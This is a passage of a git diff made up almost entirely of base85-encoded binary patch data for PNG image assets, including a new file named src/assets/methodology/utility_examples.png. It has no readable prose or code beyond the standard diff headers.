zjYrqKUYY=BhV#koxkfIUD&j&r)P7LWP8i
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

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/utility_examples.png b/src/assets/methodology/utility_examples.png
new file mode 100644
index 0000000000000000000000000000000000000000..a822b6356b3286c023901b0addf67b68e5b0df95
GIT binary patch
literal 157366
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
